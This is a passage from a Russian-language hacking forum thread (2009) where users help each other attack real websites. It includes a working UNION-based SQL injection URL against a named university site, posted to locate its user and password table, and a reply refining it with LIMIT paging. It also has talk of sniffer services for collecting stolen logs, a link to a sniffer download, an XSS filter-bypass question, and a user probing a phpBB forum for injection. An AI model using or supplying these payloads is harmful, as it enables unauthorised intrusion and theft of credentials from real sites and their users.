15.01.2009, 00:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
ACD или FastStone редактировать EXIF в Image Properties
Последний раз редактировалось Pashkela; 15.01.2009 в 00:27..
|
|
|
15.01.2009, 23:27
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
С нами:
9133681
Репутация:
90
|
|
помогите плиз найти таблицу с юзерами и пассами все облазил нигде не нашел((
http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables--
вывод всех таблиц
p.s. Сайт казанского государственного университета
|
|
|
|
15.01.2009, 01:18
|
|
Постоянный
Регистрация: 07.01.2008
Сообщений: 591
С нами:
9653789
Репутация:
549
|
|
Кто подскажет щас нормально работает сервис по сниферам http://na-s.ru/ ?
А то почему то мне логи не проходят
|
|
|
|
15.01.2009, 02:04
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Свой снифак давно надо юзать, вот, от каника:
http://pashkela.narod.ru/sniffer.rar
|
|
|
|
15.01.2009, 11:52
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
XSS
Что можно попробовать если фильтр сжирает </script>
|
|
|
|
15.01.2009, 11:57
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
http://www.inattack.ru/article/519.html
|
|
|
|
16.01.2009, 00:07
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
pinky07, используй limit в запросах:
http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+30,20--
а то там скрипт только 20 таблиц выдает.
|
|
|
|
16.01.2009, 17:52
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
здрасти, собрался ставить булку так вот интересует вопрос как поставить фиксы на хаки(эксплоиты) или же надо самим в ручную капаца в php коде и вправлять?
|
|
|
|
16.01.2009, 17:57
|
|
Banned
Регистрация: 11.01.2009
Сообщений: 3
С нами:
9121286
Репутация:
5
|
|
самому менять или ставить зафиксеные хаки
|
|
|
|
16.01.2009, 18:30
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
С нами:
9114128
Репутация:
15
|
|
Вобщем помогите мне в таком вопрсе,есть поле для ввода в форуме при вводе числа в которое ты переходишь на страницу число которой ты написал в этом поле,но если в это поле вписать капострофу,тоесть одиночную кавычку то MySQL выдаёт синтаксическую ошибку вообщем вот "Общая ошибка
Could not obtain post/user information.
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3, 3' at line 8
SELECT u.username, u.user_id, u.user_level, u.user_posts, u.user_nic_color, u.user_allowsmile, u.user_allow_viewonline, u.user_session_time, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid, u.user_reputation, u.user_reputation_plus, u.user_warnings, u.user_level FROM phpbb_posts p, phpbb_users u, phpbb_posts_text pt WHERE p.topic_id = 1 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time DESC LIMIT -3, 3
Line : 449
File : viewtopic.php"
Возможно ли здесь провисти скуль инъекцию!?Вызывает сомнение то что отрываю исходный тест то вижу это <br/>Стр.<input type="text" name="start1" size="3" value="3"><input type="submit" value=">>"/></form></p> тоесть в это поле можно вести только 3 символа!!Стоит ли пробывать провести скуль инъекцию или нет??
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
